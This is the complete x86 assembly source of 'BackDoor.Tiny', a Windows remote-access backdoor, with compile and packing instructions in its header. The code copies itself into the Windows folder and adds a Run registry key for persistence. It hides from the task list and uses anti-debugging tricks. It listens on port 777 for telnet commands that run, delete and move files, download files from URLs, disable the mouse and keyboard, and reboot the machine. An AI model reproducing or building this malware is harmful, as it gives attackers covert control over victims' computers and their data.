; ------------------------ ;;;;;;; ;;;;;;; ; BackDoor.Tiny by Radix16 ;;;;;;; Version 1.0 ;;;;;;; ; ------------------------ ;;;;;;; ;;;;;;; ; ; Heyya :) ; It's my first Tiny BackDoor for all Win32 Platform (9X/ME/2K/XP) ; Client is data Terminal (TELNET....) ; ; PORT : 777 ; ; ; ------------------------ ; Command: ; !MsgBox"topic"text - Create MessageBox ; !RunFile [FullPath] - Run File ; !DelFile [FullPath] - Delete File ; !CopFile [path]"[path] - Copy File ; !MovFile [path]"[path] - Move File ; !oCD - Open CD ; !cCD - Close CD ; !Reb - Reboot ; !dMS - Disable Mouse ; !dKB - Disable Keyboard ; !dlf [url] - Download File in C:\dw.exe ; ; ; How to compile: ; ; tasm32 -ml -m5 love.asm ; tlink32 -Tpe -aa -c -x love,love,, import32.lib ,, love.res ; pewrsec love.exe ; [telock] ; ; Contact me: ; ; Radix16@atlas.cz ; Radix16.cjb.net ; ; ------------------------ .386p locals jumps .Model flat,STDCALL include useful.inc include win32api.inc extrn GetModuleHandleA:PROC extrn DefWindowProcA:PROC extrn ExitProcess:PROC extrn LoadIconA:PROC extrn LoadCursorA:PROC extrn DialogBoxParamA:PROC extrn WSAStartup:PROC extrn WSAAsyncSelect:PROC extrn htons:PROC extrn EndDialog:PROC extrn bind:PROC extrn socket:PROC extrn listen:PROC extrn recv:PROC extrn accept:PROC extrn closesocket:PROC extrn send:PROC extrn WinExec:PROC extrn GetVersion:PROC extrn ExitWindowsEx:PROC extrn LoadLibraryA:PROC extrn WriteFile:PROC extrn GetProcAddress:PROC extrn RegCreateKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC extrn GetWindowsDirectoryA:PROC extrn GetModuleFileNameA:PROC extrn CreateFileA:PROC extrn FindWindowA:PROC extrn CloseHandle:PROC extrn CopyFileA:PROC extrn MoveFileA:PROC extrn DeleteFileA:PROC extrn ShellExecuteA:PROC extrn mciSendStringA:PROC extrn MessageBoxA:PROC ;**************************************************************************** ; DATA section ;**************************************************************************** .Data WM_USER = 0400H WM_LISTSOCKET EQU WM_USER+100 UCHAR EQU USHORT EQU ; used only if we really need 16 bits UINT EQU
; 32 bits for WIN32 ULONG EQU
IDI_ICON1 EQU 100 L equ AF_INET equ 2 PF_INET equ 2 SOCK_STREAM equ 1 EWX_REBOOT equ 2 FD_READ equ 001h FD_WRITE equ 002h FD_OOB equ 004h FD_ACCEPT equ 008h FD_CONNECT equ 010h FD_CLOSE equ 020h ; Class styles ; CS_VREDRAW = 0001h CS_HREDRAW = 0002h CS_KEYCVTWINDOW = 0004H CS_DBLCLKS = 0008h SBS_SIZEGRIP = 0010h CS_OWNDC = 0020h CS_CLASSDC = 0040h CS_PARENTDC = 0080h CS_NOKEYCVT = 0100h CS_SAVEBITS = 0800h CS_NOCLOSE = 0200h CS_BYTEALIGNCLIENT = 1000h CS_BYTEALIGNWINDOW = 2000h CS_GLOBALCLASS = 4000h ; Global window class ; ; Predefined cursor & icon IDs ; IDC_ARROW = 32512 IDC_IBEAM = 32513 IDC_WAIT = 32514 IDC_CROSS = 32515 IDC_UPARROW = 32516 IDC_SIZE = 32640 IDC_ICON = 32641 IDC_SIZENWSE = 32642 IDC_SIZENESW = 32643 IDC_SIZEWE = 32644 IDC_SIZENS = 32645 WM_NULL = 0000h WM_CREATE = 0001h WM_DESTROY = 0002h WM_MOVE = 0003h WM_SIZE = 0005h WM_ACTIVATE = 0006h WM_SETFOCUS = 0007h WM_KILLFOCUS = 0008h WM_ENABLE = 000Ah WM_SETREDRAW = 000Bh WM_SETTEXT = 000Ch WM_GETTEXT = 000Dh WM_GETTEXTLENGTH = 000Eh WM_PAINT = 000Fh WM_CLOSE = 0010h WM_QUERYENDSESSION = 0011h WM_QUIT = 0012h WM_QUERYOPEN = 0013h WM_ERASEBKGND = 0014h WM_SYSCOLORCHANGE = 0015h WM_ENDSESSION = 0016h WM_SYSTEMERROR = 0017h WM_SHOWWINDOW = 0018h WM_INITDIALOG = 0110h WM_COMMAND = 0111h WM_SYSCOMMAND = 0112h WM_TIMER = 0113h WM_HSCROLL = 0114h WM_VSCROLL = 0115h WM_INITMENU = 0116h WM_INITMENUPOPUP = 0117h WM_MENUSELECT = 011Fh WM_MENUCHAR = 0120h WM_ENTERIDLE = 0121h ; ShowWindow() Commands SW_HIDE = 0 SW_SHOWNORMAL = 1 SW_NORMAL = 1 SW_SHOWMINIMIZED = 2 SW_SHOWMAXIMIZED = 3 SW_MAXIMIZE = 3 SW_SHOWNOACTIVATE = 4 SW_SHOW = 5 SW_MINIMIZE = 6 SW_SHOWMINNOACTIVE = 7 SW_SHOWNA = 8 SW_RESTORE = 9 ; ; Edit Control Messages ; EM_GETSEL = 00B0h EM_SETSEL = 00B1h EM_GETRECT = 00B2h EM_SETRECT = 00B3h EM_SETRECTNP = 00B4h EM_SCROLL = 00B5h EM_LINESCROLL = 00B6h EM_SCROLLCARET = 00B7h EM_GETMODIFY = 00B8h EM_SETMODIFY = 00B9h EM_GETLINECOUNT = 00BAh EM_LINEINDEX = 00BBh EM_SETHANDLE = 00BCh EM_GETHANDLE = 00BDh EM_GETTHUMB = 00BEh EM_LINELENGTH = 00C1h EM_REPLACESEL = 00C2h EM_GETLINE = 00C4h EM_LIMITTEXT = 00C5h EM_CANUNDO = 00C6h EM_UNDO = 00C7h EM_FMTLINES = 00C8h EM_LINEFROMCHAR = 00C9h EM_SETTABSTOPS = 00CBh EM_SETPASSWORDCHAR = 00CCh EM_EMPTYUNDOBUFFER = 00CDh EM_GETFIRSTVISIBLELINE= 00CEh EM_SETREADONLY = 00CFh EM_SETWORDBREAKPROC = 00D0h EM_GETWORDBREAKPROC = 00D1h EM_GETPASSWORDCHAR = 00D2h EM_SETMARGINS = 00D3h EM_GETMARGINS = 00D4h SOCKADDR struc sin_family dw ? sin_port dw ? sin_addr dd ? sin_zero db 8 dup (?) SOCKADDR ends WNDCLASS struc clsStyle UINT ? clsLpfnWndProc ULONG ? clsCbClsExtra UINT ? clsCbWndExtra UINT ? clsHInstance UINT ? clsHIcon UINT ? clsHCursor UINT ? clsHbrBackground UINT ? clsLpszMenuName ULONG ? clsLpszClassName ULONG ? hIconSm UINT ? WNDCLASS ends MSGSTRUCT struc msHWND UINT ? msMESSAGE UINT ? msWPARAM UINT ? msLPARAM ULONG ? msTIME ULONG ? msPT ULONG 2 dup(?) MSGSTRUCT ends SOCKADDR struc sin_family dw ? sin_port dw ? sin_addr dd ? sin_zero db 8 dup (?) SOCKADDR ends WSADATA struc mVersion dw ? mHighVersion dw ? szDescription db 257 dup (?) szSystemStatus db 129 dup (?) iMaxSockets dw ? iMaxUpdDg dw ? lpVendorInfo dd ? WSADATA ends wsadata WSADATA <> sin SOCKADDR <> msg MSGSTRUCT wc WNDCLASS port dd 777 tmp dd 0 temp dd 0 test dd 0 hInst dd 0 listsock dd 0 ihandle dd 0 fhandle dd 0 IO_Bytes_Count dd 0 h_Key dd 0 tmp_inet dd 0 xhandler dd 0 dlg_start db 'tiny',0 sztitle db 'Explorer',0 name_bd db '[BackDoor.Tiny by Radix16] version 1.1',13,10 server_size equ $ - name_bd CDopen db 'set CDAudio door open',0 CDclose db 'set CDAudio door closed',0 keyoff db 'rundll32.exe keyboard,disable',0 mouseoff db 'rundll32.exe mouse,disable',0 command_poin dd 00000000h command_buff db 255 dup (?) send_buffer db 255 dup (?) sockdes db 4000 dup (0) win_dir db 255 dup (?) Read_Buffer db 90000 dup (?) ;**************************************************************************** ; START CODE ;**************************************************************************** .Code love_start: push offset sztitle push 0 call FindWindowA or eax,eax jne exit_bd mov eax, offset base_1 push eax push NULL call GetModuleHandleA mov [hInst], eax pop eax jmp [eax] exit_bd: push NULL call ExitProcess base_1 dd offset next_base next_base: call kill_tracers nop inc xhandler xor eax,eax ret detect_debugger: call Dis_keyboard cmp eax,123445 je kill_tracers ret kill_tracers: xor eax,eax push dword ptr fs:[eax] mov fs:[eax],esp pushfd or byte ptr [esp+1],1 popfd nop pop dword ptr fs:[eax] pop ebx dec xhandler js detect_debugger call GetVersion cmp al,5 je Next_Game @pushsz 'Kernel32.dll' call GetModuleHandleA @pushsz 'RegisterServiceProcess' push eax call GetProcAddress xchg eax, ecx jecxz Next_Game push 1 push 0 call ecx Next_Game: push 255 push offset win_dir call GetWindowsDirectoryA mov edx, offset win_dir mov dword ptr [edx+eax],'nit\' mov dword ptr [edx+eax+4],'002y' mov dword ptr [edx+eax+8],'xe.2' mov byte ptr [edx+eax+8+4],'e' sub esp,255 mov esi,esp push 255 push esi push 0 call GetModuleFileNameA push FALSE push offset win_dir push esi call CopyFileA add esp,255 xor eax,eax push offset tmp push offset h_Key push eax push 3 push eax push eax push eax @pushsz 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' push 80000002h call RegCreateKeyExA push 256 push offset win_dir push 1 push 0 @pushsz 'Boot' mov ebx, dword ptr [h_Key] push ebx call RegSetValueExA push ebx call RegCloseKey push offset wsadata push 0101h call WSAStartup mov sin.sin_family, AF_INET push port call htons mov sin.sin_port,ax mov [wc.clsStyle], CS_HREDRAW + CS_VREDRAW + CS_GLOBALCLASS mov [wc.clsLpfnWndProc], offset WndProc mov [wc.clsCbClsExtra], 0 mov [wc.clsCbWndExtra], 0 mov eax, [hInst] mov [wc.clsHInstance], eax push IDI_ICON1 push eax call LoadIconA mov [wc.clsHIcon], eax push L IDC_ARROW push L 0 call LoadCursorA mov [wc.clsHCursor], eax push 0 push offset Main_Dialog push 0 push offset dlg_start push [hInst] call DialogBoxParamA jmp Wnd_finish WndProc proc hwnd : DWORD, wmsg : DWORD, wparam : DWORD, lparam : DWORD push esi push edi push ebx push [lparam] push [wparam] push [wmsg] push [hwnd] call DefWindowProcA Wnd_finish: pop ebx pop edi pop esi ret WndProc endp public WndProc Main_Dialog proc hwnd:DWORD, wmsg:DWORD, wparam:DWORD, lparam:DWORD push ebx push esi push edi cmp [wmsg],WM_LISTSOCKET je socket_server cmp [wmsg],WM_INITDIALOG je m_init mov eax,FALSE Dialog_end: pop edi pop esi pop ebx ret ;**************************************************************************** ; DIALOG INIT ;**************************************************************************** m_init: push 0 push SOCK_STREAM push PF_INET call socket mov listsock,eax push FD_ACCEPT+FD_READ+FD_CLOSE push WM_LISTSOCKET push [hwnd] push [listsock] call WSAAsyncSelect push 16 push offset sin push [listsock] call bind push 2 push [listsock] call listen mov eax,TRUE jmp Dialog_end ;**************************************************************************** ; SERVER.... ;**************************************************************************** socket_server: mov eax,lparam cmp ax,FD_ACCEPT jne skip_1 shr eax,16 xor ebx,ebx call CheckSocketList push 0 push 0 push [listsock] call accept mov [edi],eax mov ecx,server_size lea eax,name_bd call send_data skip_1: mov eax,lparam cmp ax,FD_READ jne skip_15 mov eax,wparam xor ebx,ebx mov bx,ax mov temp,ebx push 0 push 255 push offset send_buffer push ebx call recv cmp eax,-1 je skip_15 mov edi,offset send_buffer call command_line skip_15: cmp ax,FD_CLOSE jne skip_2 mov eax,wparam xor ebx,ebx mov bx,ax call CheckSocketList mov dword ptr [edi],0 push ebx call closesocket skip_2: mov eax,TRUE jmp Dialog_end close_dialog: push L 0 push [hwnd] call EndDialog mov eax,TRUE jmp Dialog_end Main_Dialog endp public Main_Dialog CheckSocketList: lea edi,sockdes-4 CheckMoreSocket: add edi,4 cmp [edi],ebx jne CheckMoreSocket ret send_data: push 0 push ecx push eax push dword ptr [edi] call send ret command_line: pusha cmp byte ptr [edi],13 je vyhodnocovaci_system mov al,[edi] mov edx,dword ptr [command_poin] mov byte ptr [command_buff + edx],al inc command_poin popa ret ;**************************************************************************** ; COMMAND ;**************************************************************************** vyhodnocovaci_system: mov edx, offset command_buff cmp dword ptr [edx],'gsM!' jne __@1 cmp dword ptr [edx+4],'"xoB' je msg_box __@1: cmp dword ptr [edx],'DCo!' je OPENCD cmp dword ptr [edx],'DCc!' je CLOSECD cmp dword ptr [edx],'SMd!' je Dis_mouse cmp dword ptr [edx],'BKd!' je Dis_keyboard cmp dword ptr [edx],'fld!' je Download_File cmp dword ptr [edx],'beR!' je Reboot __@2: cmp dword ptr [edx],'nuR!' jne __@3 cmp dword ptr [edx+4],'eliF' je RUNFILE __@3: cmp dword ptr [edx],'leD!' jne __@4 cmp dword ptr [edx+4],'eliF' je DELFILE __@4: cmp dword ptr [edx],'poC!' jne __@5 cmp dword ptr [edx+4],'eliF' je COPFILE __@5: cmp dword ptr [edx],'voM!' jne __@6 cmp dword ptr [edx+4],'eliF' je MOVFILE __@6: cmp dword ptr [edx],'rid!' je DIR clear_: xor al,al mov ecx,256 lea edi,command_poin rep stosb mov dword ptr [command_poin],ecx popa ret ;**************************************************************************** ; MESSAGE BOX ;**************************************************************************** msg_box: add edx,8 push edx mov ecx,100 null_mode: cmp byte ptr [edx],'"' je ok_msgBOX inc edx loop null_mode pop edx jmp clear_ ok_msgBOX: xor al,al mov byte ptr [edx], al inc edx mov ebx,edx pop edx push NULL push edx push ebx push NULL call MessageBoxA jmp clear_ ;**************************************************************************** ; OPEN CD ;**************************************************************************** OPENCD: xor eax,eax push eax push eax push eax push offset CDopen call mciSendStringA jmp clear_ ;**************************************************************************** ; CLOSE CD ;**************************************************************************** CLOSECD: xor eax,eax push eax push eax push eax push offset CDclose call mciSendStringA jmp clear_ ;**************************************************************************** ; RUN FILE ;**************************************************************************** RUNFILE: add edx,9 push SW_SHOWNORMAL push NULL push NULL push edx push NULL push NULL call ShellExecuteA jmp clear_ ;**************************************************************************** ; DELETE FILE ;**************************************************************************** DELFILE: add edx,9 push edx call DeleteFileA jmp clear_ ;**************************************************************************** ; Disable Mouse ;**************************************************************************** Dis_mouse: push SW_HIDE push offset mouseoff call WinExec jmp clear_ ;**************************************************************************** ; Disable Keyboard ;**************************************************************************** Dis_keyboard: push SW_HIDE push offset keyoff call WinExec jmp clear_ ;**************************************************************************** ; REBOOT ;**************************************************************************** Reboot: push NULL push EWX_REBOOT call ExitWindowsEx push NULL call ExitProcess ;**************************************************************************** ; COPY FILE ;**************************************************************************** COPFILE: add edx,9 push edx mov ecx,120 copy_cut: cmp byte ptr [edx],'"' je Copy_f inc edx loop copy_cut pop edx jmp clear_ Copy_f: mov byte ptr [edx],0 inc edx mov ebx,edx pop edx push FALSE push ebx push edx call CopyFileA jmp clear_ ;**************************************************************************** ; MOVE FILE ;**************************************************************************** MOVFILE: add edx,9 push edx mov ecx,120 move_cut: cmp byte ptr [edx],'"' je move_f inc edx loop move_cut pop edx jmp clear_ move_f: mov byte ptr [edx],0 inc edx mov ebx,edx pop edx push ebx push edx call MoveFileA jmp clear_ ;**************************************************************************** ; DOWNLOAD FILE ;**************************************************************************** dd_InternetCloseHandle dd 0 read_file_size dd 0 Download_File: pushfd add edx,5 mov edi,edx mov ecx,120 searh_filep: cmp byte ptr [edx],'"' je f_create inc edx loop searh_filep popfd jmp clear_ f_create: mov byte ptr [edx],0 inc edx xor eax,eax push eax push eax push CREATE_ALWAYS push eax push FILE_SHARE_READ push GENERIC_WRITE push edx call CreateFileA mov [fhandle],eax @pushsz 'WinINET.dll' call LoadLibraryA xchg eax,esi @pushsz 'InternetCloseHandle' push esi call GetProcAddress mov dword ptr [dd_InternetCloseHandle],eax @pushsz 'InternetOpenA' push esi call GetProcAddress xor ebx,ebx push ebx push ebx push ebx push ebx @pushsz "Download" call eax test eax,eax je File_handle_close mov dword ptr [ihandle],eax @pushsz 'InternetOpenUrlA' push esi call GetProcAddress xor ebx,ebx push ebx push ebx push ebx push ebx push edi push dword ptr [ihandle] call eax test eax,eax je Inet_close xchg eax,edi @pushsz 'InternetReadFile' push esi call GetProcAddress push NULL push offset tmp_inet push 90000 push offset Read_Buffer push edi call eax xchg eax,ecx jecxz close_net popfd push 0 push offset IO_Bytes_Count push 90000 push offset Read_Buffer push [fhandle] call WriteFile close_net: push edi call dword ptr [dd_InternetCloseHandle] Inet_close: push dword ptr [ihandle] call dword ptr [dd_InternetCloseHandle] File_handle_close: push dword ptr [fhandle] call CloseHandle popfd jmp clear_ DIR: jmp clear_ End love_start